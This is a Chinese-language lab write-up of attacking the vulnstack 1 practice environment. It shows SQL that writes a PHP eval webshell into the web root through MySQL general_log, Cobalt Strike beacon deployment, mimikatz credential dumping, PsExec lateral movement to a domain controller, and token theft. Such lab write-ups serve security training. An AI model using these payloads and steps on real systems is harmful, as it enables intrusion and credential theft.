ATT&CK 實戰 - 紅日安全 vulnstack (一) 靶機滲透
關於部署:https://www.cnblogs.com/Cl0ud/p/13688649.html
PS:好菜,後來發現內網主機還是PING不通VM1,索性三臺主機全部配成NAT模式,按照WEB靶機(VM1)->內網滲透域成員主機(VM2)->拿下域管(VM3)的步驟進行滲透
訪問VM1:http://192.168.221.143/
收集資訊如下:
IP地址:192.168.221.143
主機資訊:Windows NT STU1 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
伺服器解析引擎:Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
網站絕對路徑:C:/phpStudy/WWW
被禁用函式:無
同時底部存在MySQL資料庫連線檢測:
輸入預設賬號密碼:root/root
證明弱密碼存在
根據經驗,一般使用phpstudy都會存在phpmyadmin介面,我們可以嘗試爆破目錄進而通過弱密碼控制資料庫
使用dirsearch進行目錄爆破
python3 dirsearch.py -u http://192.168.221.143/ -e *
如圖:
http://192.168.221.143/phpinfo.php 介面敏感資訊洩露
http://192.168.221.143/phpmyadmin/ phpmyadmin登入介面
root/root 登入
嘗試使用select into outfile寫入一句話木馬
select load_file('C:/phpStudy/WWW/ma.php'); select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/WWW/ma.php';
這裡的網站路徑是之前我們資訊蒐集時找到的
執行成功,但是在目錄下無該檔案
換一種姿勢寫入一句話木馬
參考自:https://xz.aliyun.com/t/3283
其中的利用日誌寫shell
之前的資訊蒐集我們已知伺服器mysql版本>5.0,而mysql5.0以上會建立日誌檔案,可以通過修改日誌的全域性變數getshell
步驟為:
檢測日誌儲存狀態->開啟日誌儲存->修改日誌儲存路徑->使用一句話木馬訪問網址->連線日誌路徑GETSHELL
日誌儲存狀態和日誌儲存路徑需要使用以下命令進行檢視:
general_log 指的是日誌儲存狀態,ON代表開啟,OFF代表關閉
general_log_file 指的是日誌的儲存路徑
SHOW VARIABLES LIKE 'general%'
可以看出 general_log 是關閉的,實際上該全域性變數預設關閉
接著我們開啟日誌儲存,即general_log
set global general_log = "ON";
接著修改日誌儲存路徑(此處路徑依然使用之前資訊蒐集獲得的地址):
set global general_log_file='C:/phpStudy/WWW/ma.php';
然後就是通過日誌寫入一句話木馬了,SQL查詢:
select '<?php eval($_POST[cmd]);?>';
該查詢流量會記錄在日誌檔案裡,所以我們訪問日誌檔案 ma.php
可以看到存在我們訪問的日誌資訊,看到有Notice,還是去靶機上面看看日誌檔案是否正常寫入
可以看到一句話木馬寫入成功,上菜刀!
可以看到WEB目錄和備份檔案沒有掃描出來,dirsearch的字典還是得自己有空再整理一下,beifen.rar很符合國人的命名習慣hhh
接著通過webshell 反彈 shell
關於CS的安裝:https://www.cnblogs.com/Cl0ud/p/13709669.html
關於CS的簡單使用方法:https://soapffz.com/sec/483.html
為了方便CS後臺執行,進入screen
在screen視窗中執行teamserver服務
使用screen視窗中的快捷鍵 ctrl+ad,令任務後臺執行,現在就可以關閉ssh遠端連線了,執行客戶端CS輸入之前的CS服務端IP和密碼進行登入,賬號隨意,只要與已登入的使用者不重複即可
點選connect進行連線
小春兒加入群聊 has joined,先新建一個Listener,payload選擇
beacon http,設定好對應的監聽埠
儲存後生成一個後門,使用剛才建立的監聽器:
生成後在菜刀中上傳該檔案,並且執行之
就可以看到CS主機已上線
右鍵選擇 interact 進入互動模式,將sleep調為0,這樣滲透靶機就能夠直接回顯結果,真實滲透中一般不要直接調為0,容易被流量監測,預設為60秒
冒著電腦被卡死的風險同時開啟三個虛擬機器 :D
資訊蒐集的深度,直接關係到內網滲透測試的成敗
進行本機資訊蒐集:
檢視當前許可權
shell whoami
顯示主機名稱
shell hostname
查詢使用者列表
net user
通過分析分級使用者列表,可以找到內網機器的命名規則,特別是個人機器的名稱,可以用來推測整個域的使用者命名方式
《內網安全攻防》
獲取本地管理員(通常包含域使用者)資訊
net localgroup administrators
使用systeminfo檢視系統詳細資訊
shell systeminfo
補丁資訊如下:
域內主機的補丁通常是批量安裝的,通過檢視本機補丁列表,就可以找到未打補丁的漏洞
作業系統和系統版本為:
查詢程序列表
shell tasklist
常見的防毒軟體的程序為:
程序名 | 軟體 |
---|---|
360sd.exe | 360 防毒 |
360tray.exe | 360 實時保護 |
ZhuDongFangYu.exe | 360 主動防禦 |
KSafeTray.exe | 金山衛士 |
SafeDogUpdateCenter.exe | 安全狗 |
McAfee | McShield.exe |
egui.exe | NOD32 |
AVP.exe | 卡巴斯基 |
avguard.exe | 小紅傘 |
bdagent.exe | BitDefender |
獲得了本機的相關資訊之後,就要判斷當前內網中是否存在域
之前在systeminfo中,"域"即為域名,如果"域"為"WORKGROUP",則表示當前伺服器不在域內:
也可以使用 ipconfig 命令,檢視網路資訊
得知DNS伺服器名稱為 god.org,DNS伺服器往往與域控制器在同一臺伺服器上
檢視域資訊:
shell net view
檢視當前登入域及登入使用者資訊
shell net config workstation
\
"工作站域DNS名稱"為域名,如果為WORKGROUP表示當前為非域環境
"登入域"表示當前登入的使用者是域使用者還是本地使用者
繼續蒐集域內基礎資訊
查詢域
shell net view /domain
查詢 GOD域內全部主機:
shell net view /domain:GOD
同時可以在targets裡面看到掃描出來的主機
提升本機許可權 getsystem
getsystem
獲取憑據,使用 dump hash模組匯出雜湊值(至少具有administrators許可權)
獲取當前計算機中本地使用者的密碼雜湊值
使用logonpasswords模組,呼叫內建在CS中的mimikatz將記憶體中的lsass.exe程序儲存的使用者明文密碼和雜湊匯出
可以看到匯出的憑據資訊:
同時我們之前在橫向探測中已經獲取到了其他targets的資訊,加上現在獲取到的憑證,我們可以嘗試利用獲取到的憑證+PsExec模組登入其他主機
雖然搭建環境的時候沒有搭建成內網的,但是還是建立一個SMB的監聽器:
關於 SMB Beacon
SMB Beacon 使用命名管道通過父級 Beacon 進行通訊,當兩個 Beacons 連結後,子 Beacon 從父 Beacon 獲取到任務併發送。因為連結的 Beacons 使用 Windows 命名管道進行通訊,此流量封裝在 SMB 協議中,所以 SMB Beacon 相對隱蔽,繞防火牆時可能發揮奇效
SMB Beacon有兩種使用方式:
-
直接派生一個孩子,目的為了進一步盜取hash
-
在已有的beacon上建立監聽,用來作為跳板進行內網滲透
這裡我們使用第二種方式,建立SMB監聽:
在彈出的視窗中選擇使用 god.org
的 Administrator
的憑證資訊
監聽器選擇剛才建立的 smb beacon
,會話也選擇對應的 smb beacon
的會話:
點選launch之後等待一會,就可以獲取到域控主機OWA的beacon
在域控主機上繼續匯出憑據,可以獲得整個域內使用者的密碼雜湊值
hashdump+logonpasswords
檢視已經獲取到的憑據
同樣的方法獲取到ROOT-TVI862UBEH主機的許可權
現在的樞紐結構為:
能夠使用 psexec
能迅速地獲得域控主機的 beacon
是因為在本機中讀取到了域管理員賬號密碼的 hash
接下來在派生的STU1主機上嘗試使用token竊取
選擇 GOD\Administrator
的 token
盜取:
點選後token會儲存在當前會話中
嘗試登入ROOT主機
在令牌處勾選當前token
不知道為啥失敗了 嗚嗚嗚
等內網滲透熟練了再來複更,暫時就先做到這裡趴。
關於CS和MSF的聯動會在紅日安全靶機2中進行練習
參考連結
https://soapffz.com/sec/558.html